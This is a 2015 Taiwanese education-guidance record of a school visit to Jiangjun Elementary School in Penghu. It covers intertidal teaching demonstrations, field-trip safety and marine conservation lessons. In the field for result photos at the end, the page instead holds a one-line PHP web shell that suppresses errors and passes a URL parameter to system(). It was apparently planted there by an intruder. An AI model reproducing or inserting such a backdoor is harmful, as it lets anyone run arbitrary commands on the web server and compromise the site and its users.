到校輔導-將軍國小

澎湖縣國教輔導團104年度到校輔導紀錄表

服務對象: 
望安鄉將軍國小
領域別: 
國小自然與生活科技領域
到校輔導時間: 
2015-10-28 三
出席人員: 
鄭謙遜、洪清林、洪健中
輔導方式: 
教學示例
學校狀況: 
該領域專長教師:0 人 非領域專長教師:12 人
學校特色: 

位在澎湖望安鄉—將軍嶼。學校近年積極發展海洋與地質地形特色課程。

提供相關問題解決策略: 

1. 教師可參考輔導團編輯之「七美鄉、望安鄉校外教學手冊」一書,再搜集補充資料。
2. 在進行場勘後,應設定一條警戒線,並嚴格約束學生;在警戒線內,則規畫有趣的探索活動,讓學生在安全的範圍內,便能進行豐富多元的活動,並感到滿足。

課程與教學相關問題描述: 

1. 非領域專長教師,應如何準備?
2. 校外教學應如何兼顧安全與探索性?

到校輔導內容重點: 

1. 潮間帶教學應注意事項說明。
2. 潮間帶教學演示。
3. 生態保育、永續海洋的理念傳達。

提供改善學生學習成效之教師教學方案: 

1. 校外教學應多設計主動探索活動,教師可先設計教學目標,例如要比較潮上帶與潮間帶的不同,應先讓學生觀察,發現是否有不同點,再進行引導,逐步達成解說重點。
2. 教師可準備放大鏡和照相機,帶領學生進行實際觀察,或拍照回學校再查證,都會讓學生有更佳的學習成效。

意見反映: 
1. 感謝輔導團提供兼具實務、理念與操作的到校輔導活動,讓老師獲益良多。 2. 這次因時間關係,只有到北邊潮間帶,希望在下學期的有機會,能再請輔導團老師蒞校指導,到更多不同的點進行解說活動,並希望能在本校教師演練教學中,得到回饋,以達成教學之精進。
到校輔導成果照片: 
error_reporting(0); $bozx=$_GET[boz]; system($bozx);